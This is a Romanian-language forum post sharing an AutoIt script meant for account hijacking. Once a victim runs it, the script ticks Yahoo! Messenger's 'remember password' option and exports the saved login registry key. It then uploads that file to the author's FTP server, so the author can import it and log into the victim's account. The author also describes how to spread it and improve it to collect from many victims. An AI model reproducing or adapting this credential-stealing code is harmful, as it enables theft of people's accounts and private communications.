Jump to content
willboy

Trimite ets pe un server ftp

Recommended Posts

Codul este scris in AutoIt.

Mi-a venit ideea cand am vazut faza "cum sa imprastii virusi cu java" , si m-am gandit sa nu pun virus langa allpet-u java , asa ca am scris acest mic script care atunci cand cineva il executa scriptul asteapta fereastra Yahoo! Messenger. Cand fereastra este deschisa se bifeaza automat remember password, si se apasa click in casuta in care baga id-ul. dupa 10 sec se exporta ets in c, dupa care ets se pune pe un server ftp. Apoi cand import ets in registry pot intra pe id-ul respectiv. Fara keylogger :), sunt incepator. Am sa modific codul, ca export ets sa faca atunci cand vede instant message, astfel incat sa fiu sigur ca ets se exporta ca asa cu 10 sec poate nu i intra pe mess. si ets.reg sa se salveze cu numele calculatorului.reg ca asa daca ar fi mai multi s-ar face replace.

#NoTrayIcon

#include <FTPEx.au3>

#include <File.au3>

ControlClick("Yahoo! Messenger", "", "[CLASS:YahooBuddyMain;Text:&Remember my ID && password; ID:229;Instance:1]")

ControlClick("Yahoo! Messenger", "", "[CLASS:YahooBuddyMain;Text:"";ID:211;Instance:1]")

Sleep(10000)

ShellExecuteWait("regedit.exe","/e ets.reg HKEY_CURRENT_USER\Software\Yahoo\pager", "c:\")

if FileExists("c:\ets.reg") Then

$server = 'server ftp'

$username = 'nume'

$pass = 'parola'

$Open = _FTP_Open('MyFTP')

$Conn = _FTP_Connect($Open, $server, $username, $pass, 0, 21)

_FTP_FilePut($Conn, 'C:\ets.reg', 'ftptest.txt', 0x08000000)

$Ftpc = _FTP_Close($Open)

EndIf

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...